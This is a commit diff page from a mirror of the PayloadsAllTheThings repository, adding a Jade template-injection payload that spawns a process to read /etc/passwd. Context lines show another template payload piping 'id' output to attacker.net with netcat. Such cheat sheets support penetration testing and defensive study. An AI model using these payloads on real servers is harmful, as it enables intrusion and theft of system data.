mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
Improved Jade payload
This commit is contained in:
parent
1137bfca8d
commit
ed944a95af
@ -291,6 +291,10 @@ New version of Pebble :
|
|||||||
= x.exec('id | nc attacker.net 80')
|
= x.exec('id | nc attacker.net 80')
|
||||||
```
|
```
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
|
||||||
|
```
|
||||||
|
|
||||||
## Velocity
|
## Velocity
|
||||||
|
|
||||||
```python
|
```python
|
||||||
|
Loading…
Reference in New Issue
Block a user